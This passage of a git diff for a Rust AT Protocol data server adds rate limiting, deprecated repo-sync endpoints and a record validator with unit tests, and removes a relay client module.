pub rate_limiters: Arc<RateLimiters>,
|
||||
pub circuit_breakers: Arc<CircuitBreakers>,
|
||||
}
|
||||
|
||||
impl AppState {
|
||||
@@ -21,11 +25,25 @@ impl AppState {
|
||||
let block_store = PostgresBlockStore::new(db.clone());
|
||||
let blob_store = S3BlobStorage::new().await;
|
||||
let (firehose_tx, _) = broadcast::channel(1000);
|
||||
let rate_limiters = Arc::new(RateLimiters::new());
|
||||
let circuit_breakers = Arc::new(CircuitBreakers::new());
|
||||
Self {
|
||||
db,
|
||||
block_store,
|
||||
blob_store: Arc::new(blob_store),
|
||||
firehose_tx,
|
||||
rate_limiters,
|
||||
circuit_breakers,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn with_rate_limiters(mut self, rate_limiters: RateLimiters) -> Self {
|
||||
self.rate_limiters = Arc::new(rate_limiters);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_circuit_breakers(mut self, circuit_breakers: CircuitBreakers) -> Self {
|
||||
self.circuit_breakers = Arc::new(circuit_breakers);
|
||||
self
|
||||
}
|
||||
}
|
||||
|
||||
@@ -19,8 +19,6 @@ pub async fn notify_of_update(
|
||||
Query(params): Query<NotifyOfUpdateParams>,
|
||||
) -> Response {
|
||||
info!("Received notifyOfUpdate from hostname: {}", params.hostname);
|
||||
info!("TODO: Queue job for notifyOfUpdate (not implemented)");
|
||||
|
||||
(StatusCode::OK, Json(json!({}))).into_response()
|
||||
}
|
||||
|
||||
@@ -34,7 +32,5 @@ pub async fn request_crawl(
|
||||
Json(input): Json<RequestCrawlInput>,
|
||||
) -> Response {
|
||||
info!("Received requestCrawl for hostname: {}", input.hostname);
|
||||
info!("TODO: Queue job for requestCrawl (not implemented)");
|
||||
|
||||
(StatusCode::OK, Json(json!({}))).into_response()
|
||||
}
|
||||
|
||||
209
src/sync/deprecated.rs
Normal file
209
src/sync/deprecated.rs
Normal file
@@ -0,0 +1,209 @@
|
||||
use crate::state::AppState;
|
||||
use crate::sync::car::encode_car_header;
|
||||
use axum::{
|
||||
Json,
|
||||
extract::{Query, State},
|
||||
http::StatusCode,
|
||||
response::{IntoResponse, Response},
|
||||
};
|
||||
use cid::Cid;
|
||||
use ipld_core::ipld::Ipld;
|
||||
use jacquard_repo::storage::BlockStore;
|
||||
use serde::{Deserialize, Serialize};
|
||||
use serde_json::json;
|
||||
use std::io::Write;
|
||||
use std::str::FromStr;
|
||||
use tracing::error;
|
||||
|
||||
const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000;
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetHeadParams {
|
||||
pub did: String,
|
||||
}
|
||||
|
||||
#[derive(Serialize)]
|
||||
pub struct GetHeadOutput {
|
||||
pub root: String,
|
||||
}
|
||||
|
||||
pub async fn get_head(
|
||||
State(state): State<AppState>,
|
||||
Query(params): Query<GetHeadParams>,
|
||||
) -> Response {
|
||||
let did = params.did.trim();
|
||||
|
||||
if did.is_empty() {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
|
||||
let result = sqlx::query!(
|
||||
r#"
|
||||
SELECT r.repo_root_cid
|
||||
FROM repos r
|
||||
JOIN users u ON r.user_id = u.id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await;
|
||||
|
||||
match result {
|
||||
Ok(Some(row)) => (StatusCode::OK, Json(GetHeadOutput { root: row.repo_root_cid })).into_response(),
|
||||
Ok(None) => (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({"error": "HeadNotFound", "message": "Could not find root for DID"})),
|
||||
)
|
||||
.into_response(),
|
||||
Err(e) => {
|
||||
error!("DB error in get_head: {:?}", e);
|
||||
(
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError"})),
|
||||
)
|
||||
.into_response()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Deserialize)]
|
||||
pub struct GetCheckoutParams {
|
||||
pub did: String,
|
||||
}
|
||||
|
||||
pub async fn get_checkout(
|
||||
State(state): State<AppState>,
|
||||
Query(params): Query<GetCheckoutParams>,
|
||||
) -> Response {
|
||||
let did = params.did.trim();
|
||||
|
||||
if did.is_empty() {
|
||||
return (
|
||||
StatusCode::BAD_REQUEST,
|
||||
Json(json!({"error": "InvalidRequest", "message": "did is required"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
|
||||
let repo_row = sqlx::query!(
|
||||
r#"
|
||||
SELECT r.repo_root_cid
|
||||
FROM repos r
|
||||
JOIN users u ON u.id = r.user_id
|
||||
WHERE u.did = $1
|
||||
"#,
|
||||
did
|
||||
)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.unwrap_or(None);
|
||||
|
||||
let head_str = match repo_row {
|
||||
Some(r) => r.repo_root_cid,
|
||||
None => {
|
||||
let user_exists = sqlx::query!("SELECT id FROM users WHERE did = $1", did)
|
||||
.fetch_optional(&state.db)
|
||||
.await
|
||||
.unwrap_or(None);
|
||||
|
||||
if user_exists.is_none() {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "RepoNotFound", "message": "Repo not found"})),
|
||||
)
|
||||
.into_response();
|
||||
} else {
|
||||
return (
|
||||
StatusCode::NOT_FOUND,
|
||||
Json(json!({"error": "RepoNotFound", "message": "Repo not initialized"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
let head_cid = match Cid::from_str(&head_str) {
|
||||
Ok(c) => c,
|
||||
Err(_) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError", "message": "Invalid head CID"})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let mut car_bytes = match encode_car_header(&head_cid) {
|
||||
Ok(h) => h,
|
||||
Err(e) => {
|
||||
return (
|
||||
StatusCode::INTERNAL_SERVER_ERROR,
|
||||
Json(json!({"error": "InternalError", "message": format!("Failed to encode CAR header: {}", e)})),
|
||||
)
|
||||
.into_response();
|
||||
}
|
||||
};
|
||||
|
||||
let mut stack = vec![head_cid];
|
||||
let mut visited = std::collections::HashSet::new();
|
||||
let mut remaining = MAX_REPO_BLOCKS_TRAVERSAL;
|
||||
|
||||
while let Some(cid) = stack.pop() {
|
||||
if visited.contains(&cid) {
|
||||
continue;
|
||||
}
|
||||
visited.insert(cid);
|
||||
if remaining == 0 {
|
||||
break;
|
||||
}
|
||||
remaining -= 1;
|
||||
|
||||
if let Ok(Some(block)) = state.block_store.get(&cid).await {
|
||||
let cid_bytes = cid.to_bytes();
|
||||
let total_len = cid_bytes.len() + block.len();
|
||||
let mut writer = Vec::new();
|
||||
crate::sync::car::write_varint(&mut writer, total_len as u64)
|
||||
.expect("Writing to Vec<u8> should never fail");
|
||||
writer.write_all(&cid_bytes)
|
||||
.expect("Writing to Vec<u8> should never fail");
|
||||
writer.write_all(&block)
|
||||
.expect("Writing to Vec<u8> should never fail");
|
||||
car_bytes.extend_from_slice(&writer);
|
||||
|
||||
if let Ok(value) = serde_ipld_dagcbor::from_slice::<Ipld>(&block) {
|
||||
extract_links_ipld(&value, &mut stack);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
(
|
||||
StatusCode::OK,
|
||||
[(axum::http::header::CONTENT_TYPE, "application/vnd.ipld.car")],
|
||||
car_bytes,
|
||||
)
|
||||
.into_response()
|
||||
}
|
||||
|
||||
fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) {
|
||||
match value {
|
||||
Ipld::Link(cid) => {
|
||||
stack.push(*cid);
|
||||
}
|
||||
Ipld::Map(map) => {
|
||||
for v in map.values() {
|
||||
extract_links_ipld(v, stack);
|
||||
}
|
||||
}
|
||||
Ipld::List(arr) => {
|
||||
for v in arr {
|
||||
extract_links_ipld(v, stack);
|
||||
}
|
||||
}
|
||||
_ => {}
|
||||
}
|
||||
}
|
||||
@@ -2,11 +2,11 @@ pub mod blob;
|
||||
pub mod car;
|
||||
pub mod commit;
|
||||
pub mod crawl;
|
||||
pub mod deprecated;
|
||||
pub mod firehose;
|
||||
pub mod frame;
|
||||
pub mod import;
|
||||
pub mod listener;
|
||||
pub mod relay_client;
|
||||
pub mod repo;
|
||||
pub mod subscribe_repos;
|
||||
pub mod util;
|
||||
@@ -15,6 +15,7 @@ pub mod verify;
|
||||
pub use blob::{get_blob, list_blobs};
|
||||
pub use commit::{get_latest_commit, get_repo_status, list_repos};
|
||||
pub use crawl::{notify_of_update, request_crawl};
|
||||
pub use repo::{get_blocks, get_repo, get_record};
|
||||
pub use deprecated::{get_checkout, get_head};
|
||||
pub use repo::{get_blocks, get_record, get_repo};
|
||||
pub use subscribe_repos::subscribe_repos;
|
||||
pub use verify::{CarVerifier, VerifiedCar, VerifyError};
|
||||
|
||||
@@ -1,83 +0,0 @@
|
||||
use crate::state::AppState;
|
||||
use crate::sync::util::format_event_for_sending;
|
||||
use futures::{sink::SinkExt, stream::StreamExt};
|
||||
use std::time::Duration;
|
||||
use tokio::sync::mpsc;
|
||||
use tokio_tungstenite::{connect_async, tungstenite::Message};
|
||||
use tracing::{error, info, warn};
|
||||
|
||||
async fn run_relay_client(state: AppState, url: String, ready_tx: Option<mpsc::Sender<()>>) {
|
||||
info!("Starting firehose client for relay: {}", url);
|
||||
loop {
|
||||
match connect_async(&url).await {
|
||||
Ok((mut ws_stream, _)) => {
|
||||
info!("Connected to firehose relay: {}", url);
|
||||
let mut rx = state.firehose_tx.subscribe();
|
||||
if let Some(tx) = ready_tx.as_ref() {
|
||||
tx.send(()).await.ok();
|
||||
}
|
||||
|
||||
loop {
|
||||
tokio::select! {
|
||||
Ok(event) = rx.recv() => {
|
||||
match format_event_for_sending(&state, event).await {
|
||||
Ok(bytes) => {
|
||||
if let Err(e) = ws_stream.send(Message::Binary(bytes.into())).await {
|
||||
warn!("Failed to send event to {}: {}. Disconnecting.", url, e);
|
||||
break;
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Failed to format event for relay {}: {}", url, e);
|
||||
}
|
||||
}
|
||||
}
|
||||
Some(msg) = ws_stream.next() => {
|
||||
if let Ok(Message::Close(_)) = msg {
|
||||
warn!("Relay {} closed connection.", url);
|
||||
break;
|
||||
}
|
||||
}
|
||||
else => break,
|
||||
}
|
||||
}
|
||||
}
|
||||
Err(e) => {
|
||||
error!("Failed to connect to firehose relay {}: {}", url, e);
|
||||
}
|
||||
}
|
||||
warn!(
|
||||
"Disconnected from {}. Reconnecting in 5 seconds...",
|
||||
url
|
||||
);
|
||||
tokio::time::sleep(Duration::from_secs(5)).await;
|
||||
}
|
||||
}
|
||||
|
||||
pub async fn start_relay_clients(
|
||||
state: AppState,
|
||||
relays: Vec<String>,
|
||||
mut ready_rx: Option<mpsc::Receiver<()>>,
|
||||
) {
|
||||
if relays.is_empty() {
|
||||
return;
|
||||
}
|
||||
|
||||
let (ready_tx, mut internal_ready_rx) = mpsc::channel(1);
|
||||
|
||||
for url in relays {
|
||||
let ready_tx = if ready_rx.is_some() {
|
||||
Some(ready_tx.clone())
|
||||
} else {
|
||||
None
|
||||
};
|
||||
tokio::spawn(run_relay_client(state.clone(), url, ready_tx));
|
||||
}
|
||||
|
||||
if let Some(mut rx) = ready_rx.take() {
|
||||
tokio::spawn(async move {
|
||||
internal_ready_rx.recv().await;
|
||||
rx.close();
|
||||
});
|
||||
}
|
||||
}
|
||||
504
src/validation/mod.rs
Normal file
504
src/validation/mod.rs
Normal file
@@ -0,0 +1,504 @@
|
||||
use serde_json::Value;
|
||||
use thiserror::Error;
|
||||
|
||||
#[derive(Debug, Error)]
|
||||
pub enum ValidationError {
|
||||
#[error("No $type provided")]
|
||||
MissingType,
|
||||
|
||||
#[error("Invalid $type: expected {expected}, got {actual}")]
|
||||
TypeMismatch { expected: String, actual: String },
|
||||
|
||||
#[error("Missing required field: {0}")]
|
||||
MissingField(String),
|
||||
|
||||
#[error("Invalid field value at {path}: {message}")]
|
||||
InvalidField { path: String, message: String },
|
||||
|
||||
#[error("Invalid datetime format at {path}: must be RFC-3339/ISO-8601")]
|
||||
InvalidDatetime { path: String },
|
||||
|
||||
#[error("Invalid record: {0}")]
|
||||
InvalidRecord(String),
|
||||
|
||||
#[error("Unknown record type: {0}")]
|
||||
UnknownType(String),
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum ValidationStatus {
|
||||
Valid,
|
||||
Unknown,
|
||||
Invalid,
|
||||
}
|
||||
|
||||
pub struct RecordValidator {
|
||||
require_lexicon: bool,
|
||||
}
|
||||
|
||||
impl Default for RecordValidator {
|
||||
fn default() -> Self {
|
||||
Self::new()
|
||||
}
|
||||
}
|
||||
|
||||
impl RecordValidator {
|
||||
pub fn new() -> Self {
|
||||
Self {
|
||||
require_lexicon: false,
|
||||
}
|
||||
}
|
||||
|
||||
pub fn require_lexicon(mut self, require: bool) -> Self {
|
||||
self.require_lexicon = require;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn validate(
|
||||
&self,
|
||||
record: &Value,
|
||||
collection: &str,
|
||||
) -> Result<ValidationStatus, ValidationError> {
|
||||
let obj = record
|
||||
.as_object()
|
||||
.ok_or_else(|| ValidationError::InvalidRecord("Record must be an object".to_string()))?;
|
||||
|
||||
let record_type = obj
|
||||
.get("$type")
|
||||
.and_then(|v| v.as_str())
|
||||
.ok_or(ValidationError::MissingType)?;
|
||||
|
||||
if record_type != collection {
|
||||
return Err(ValidationError::TypeMismatch {
|
||||
expected: collection.to_string(),
|
||||
actual: record_type.to_string(),
|
||||
});
|
||||
}
|
||||
|
||||
if let Some(created_at) = obj.get("createdAt").and_then(|v| v.as_str()) {
|
||||
validate_datetime(created_at, "createdAt")?;
|
||||
}
|
||||
|
||||
match record_type {
|
||||
"app.bsky.feed.post" => self.validate_post(obj)?,
|
||||
"app.bsky.actor.profile" => self.validate_profile(obj)?,
|
||||
"app.bsky.feed.like" => self.validate_like(obj)?,
|
||||
"app.bsky.feed.repost" => self.validate_repost(obj)?,
|
||||
"app.bsky.graph.follow" => self.validate_follow(obj)?,
|
||||
"app.bsky.graph.block" => self.validate_block(obj)?,
|
||||
"app.bsky.graph.list" => self.validate_list(obj)?,
|
||||
"app.bsky.graph.listitem" => self.validate_list_item(obj)?,
|
||||
"app.bsky.feed.generator" => self.validate_feed_generator(obj)?,
|
||||
"app.bsky.feed.threadgate" => self.validate_threadgate(obj)?,
|
||||
"app.bsky.labeler.service" => self.validate_labeler_service(obj)?,
|
||||
_ => {
|
||||
if self.require_lexicon {
|
||||
return Err(ValidationError::UnknownType(record_type.to_string()));
|
||||
}
|
||||
return Ok(ValidationStatus::Unknown);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(ValidationStatus::Valid)
|
||||
}
|
||||
|
||||
fn validate_post(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("text") {
|
||||
return Err(ValidationError::MissingField("text".to_string()));
|
||||
}
|
||||
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
|
||||
if let Some(text) = obj.get("text").and_then(|v| v.as_str()) {
|
||||
let grapheme_count = text.chars().count();
|
||||
if grapheme_count > 3000 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "text".to_string(),
|
||||
message: format!("Text exceeds maximum length of 3000 characters (got {})", grapheme_count),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) {
|
||||
if langs.len() > 3 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "langs".to_string(),
|
||||
message: "Maximum 3 languages allowed".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) {
|
||||
if tags.len() > 8 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "tags".to_string(),
|
||||
message: "Maximum 8 tags allowed".to_string(),
|
||||
});
|
||||
}
|
||||
for (i, tag) in tags.iter().enumerate() {
|
||||
if let Some(tag_str) = tag.as_str() {
|
||||
if tag_str.len() > 640 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: format!("tags/{}", i),
|
||||
message: "Tag exceeds maximum length of 640 bytes".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_profile(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
|
||||
let grapheme_count = display_name.chars().count();
|
||||
if grapheme_count > 640 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "displayName".to_string(),
|
||||
message: format!("Display name exceeds maximum length of 640 characters (got {})", grapheme_count),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
if let Some(description) = obj.get("description").and_then(|v| v.as_str()) {
|
||||
let grapheme_count = description.chars().count();
|
||||
if grapheme_count > 2560 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "description".to_string(),
|
||||
message: format!("Description exceeds maximum length of 2560 characters (got {})", grapheme_count),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_like(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("subject") {
|
||||
return Err(ValidationError::MissingField("subject".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
self.validate_strong_ref(obj.get("subject"), "subject")?;
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_repost(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("subject") {
|
||||
return Err(ValidationError::MissingField("subject".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
self.validate_strong_ref(obj.get("subject"), "subject")?;
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_follow(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("subject") {
|
||||
return Err(ValidationError::MissingField("subject".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
|
||||
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
|
||||
if !subject.starts_with("did:") {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "subject".to_string(),
|
||||
message: "Subject must be a DID".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_block(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("subject") {
|
||||
return Err(ValidationError::MissingField("subject".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
|
||||
if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) {
|
||||
if !subject.starts_with("did:") {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "subject".to_string(),
|
||||
message: "Subject must be a DID".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_list(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("name") {
|
||||
return Err(ValidationError::MissingField("name".to_string()));
|
||||
}
|
||||
if !obj.contains_key("purpose") {
|
||||
return Err(ValidationError::MissingField("purpose".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
|
||||
if let Some(name) = obj.get("name").and_then(|v| v.as_str()) {
|
||||
if name.is_empty() || name.len() > 64 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "name".to_string(),
|
||||
message: "Name must be 1-64 characters".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_list_item(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("subject") {
|
||||
return Err(ValidationError::MissingField("subject".to_string()));
|
||||
}
|
||||
if !obj.contains_key("list") {
|
||||
return Err(ValidationError::MissingField("list".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_feed_generator(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("did") {
|
||||
return Err(ValidationError::MissingField("did".to_string()));
|
||||
}
|
||||
if !obj.contains_key("displayName") {
|
||||
return Err(ValidationError::MissingField("displayName".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
|
||||
if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) {
|
||||
if display_name.is_empty() || display_name.len() > 240 {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: "displayName".to_string(),
|
||||
message: "displayName must be 1-240 characters".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_threadgate(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("post") {
|
||||
return Err(ValidationError::MissingField("post".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_labeler_service(&self, obj: &serde_json::Map<String, Value>) -> Result<(), ValidationError> {
|
||||
if !obj.contains_key("policies") {
|
||||
return Err(ValidationError::MissingField("policies".to_string()));
|
||||
}
|
||||
if !obj.contains_key("createdAt") {
|
||||
return Err(ValidationError::MissingField("createdAt".to_string()));
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn validate_strong_ref(&self, value: Option<&Value>, path: &str) -> Result<(), ValidationError> {
|
||||
let obj = value
|
||||
.and_then(|v| v.as_object())
|
||||
.ok_or_else(|| ValidationError::InvalidField {
|
||||
path: path.to_string(),
|
||||
message: "Must be a strong reference object".to_string(),
|
||||
})?;
|
||||
|
||||
if !obj.contains_key("uri") {
|
||||
return Err(ValidationError::MissingField(format!("{}/uri", path)));
|
||||
}
|
||||
if !obj.contains_key("cid") {
|
||||
return Err(ValidationError::MissingField(format!("{}/cid", path)));
|
||||
}
|
||||
|
||||
if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) {
|
||||
if !uri.starts_with("at://") {
|
||||
return Err(ValidationError::InvalidField {
|
||||
path: format!("{}/uri", path),
|
||||
message: "URI must be an at:// URI".to_string(),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
}
|
||||
|
||||
fn validate_datetime(value: &str, path: &str) -> Result<(), ValidationError> {
|
||||
if chrono::DateTime::parse_from_rfc3339(value).is_err() {
|
||||
return Err(ValidationError::InvalidDatetime {
|
||||
path: path.to_string(),
|
||||
});
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn validate_record_key(rkey: &str) -> Result<(), ValidationError> {
|
||||
if rkey.is_empty() {
|
||||
return Err(ValidationError::InvalidRecord("Record key cannot be empty".to_string()));
|
||||
}
|
||||
|
||||
if rkey.len() > 512 {
|
||||
return Err(ValidationError::InvalidRecord("Record key exceeds maximum length of 512".to_string()));
|
||||
}
|
||||
|
||||
if rkey == "." || rkey == ".." {
|
||||
return Err(ValidationError::InvalidRecord("Record key cannot be '.' or '..'".to_string()));
|
||||
}
|
||||
|
||||
let valid_chars = rkey.chars().all(|c| {
|
||||
c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_' || c == '~'
|
||||
});
|
||||
|
||||
if !valid_chars {
|
||||
return Err(ValidationError::InvalidRecord(
|
||||
"Record key contains invalid characters (must be alphanumeric, '.', '-', '_', or '~')".to_string()
|
||||
));
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn validate_collection_nsid(collection: &str) -> Result<(), ValidationError> {
|
||||
if collection.is_empty() {
|
||||
return Err(ValidationError::InvalidRecord("Collection NSID cannot be empty".to_string()));
|
||||
}
|
||||
|
||||
let parts: Vec<&str> = collection.split('.').collect();
|
||||
if parts.len() < 3 {
|
||||
return Err(ValidationError::InvalidRecord(
|
||||
"Collection NSID must have at least 3 segments".to_string()
|
||||
));
|
||||
}
|
||||
|
||||
for part in &parts {
|
||||
if part.is_empty() {
|
||||
return Err(ValidationError::InvalidRecord(
|
||||
"Collection NSID segments cannot be empty".to_string()
|
||||
));
|
||||
}
|
||||
if !part.chars().all(|c| c.is_ascii_alphanumeric() || c == '-') {
|
||||
return Err(ValidationError::InvalidRecord(
|
||||
"Collection NSID segments must be alphanumeric or hyphens".to_string()
|
||||
));
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use serde_json::json;
|
||||
|
||||
#[test]
|
||||
fn test_validate_post() {
|
||||
let validator = RecordValidator::new();
|
||||
|
||||
let valid_post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"text": "Hello, world!",
|
||||
"createdAt": "2024-01-01T00:00:00.000Z"
|
||||
});
|
||||
|
||||
assert_eq!(
|
||||
validator.validate(&valid_post, "app.bsky.feed.post").unwrap(),
|
||||
ValidationStatus::Valid
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_post_missing_text() {
|
||||
let validator = RecordValidator::new();
|
||||
|
||||
let invalid_post = json!({
|
||||
"$type": "app.bsky.feed.post",
|
||||
"createdAt": "2024-01-01T00:00:00.000Z"
|
||||
});
|
||||
|
||||
assert!(validator.validate(&invalid_post, "app.bsky.feed.post").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_type_mismatch() {
|
||||
let validator = RecordValidator::new();
|
||||
|
||||
let record = json!({
|
||||
"$type": "app.bsky.feed.like",
|
||||
"subject": {"uri": "at://did:plc:test/app.bsky.feed.post/123", "cid": "bafyrei..."},
|
||||
"createdAt": "2024-01-01T00:00:00.000Z"
|
||||
});
|
||||
|
||||
let result = validator.validate(&record, "app.bsky.feed.post");
|
||||
assert!(matches!(result, Err(ValidationError::TypeMismatch { .. })));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type() {
|
||||
let validator = RecordValidator::new();
|
||||
|
||||
let record = json!({
|
||||
"$type": "com.example.custom",
|
||||
"data": "test"
|
||||
});
|
||||
|
||||
assert_eq!(
|
||||
validator.validate(&record, "com.example.custom").unwrap(),
|
||||
ValidationStatus::Unknown
|
||||
);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_unknown_type_strict() {
|
||||
let validator = RecordValidator::new().require_lexicon(true);
|
||||
|
||||
let record = json!({
|
||||
"$type": "com.example.custom",
|
||||
"data": "test"
|
||||
});
|
||||
|
||||
let result = validator.validate(&record, "com.example.custom");
|
||||
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_record_key() {
|
||||
assert!(validate_record_key("valid-key_123").is_ok());
|
||||
assert!(validate_record_key("3k2n5j2").is_ok());
|
||||
assert!(validate_record_key(".").is_err());
|
||||
assert!(validate_record_key("..").is_err());
|
||||
assert!(validate_record_key("").is_err());
|
||||
assert!(validate_record_key("invalid/key").is_err());
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn test_validate_collection_nsid() {
|
||||
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
|
||||
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
|
||||
assert!(validate_collection_nsid("invalid").is_err());
|
||||
assert!(validate_collection_nsid("a.b").is_err());
|
||||
assert!(validate_collection_nsid("").is_err());
|
||||
}
|
||||
}
|
||||
315
tests/image_processing.rs
Normal file
315
tests/image_processing.rs
Normal file
@@ -0,0 +1,315 @@
|
||||
use bspds::image::{ImageProcessor, ImageError, OutputFormat, THUMB_SIZE_FEED, THUMB_SIZE_FULL, DEFAULT_MAX_FILE_SIZE};
|
||||
use image::{DynamicImage, ImageFormat};
|
||||
use std::io::Cursor;
|
||||
|
||||
fn create_test_png(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> {
|
||||
let img = DynamicImage::new_rgb8(width, height);
|
||||
let mut buf = Vec::new();
|
||||
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap();
|
||||
buf
|
||||
}
|
||||
|
||||
fn create_test_gif(width: u32, height: u32) -> Vec<u8> {
|
||||
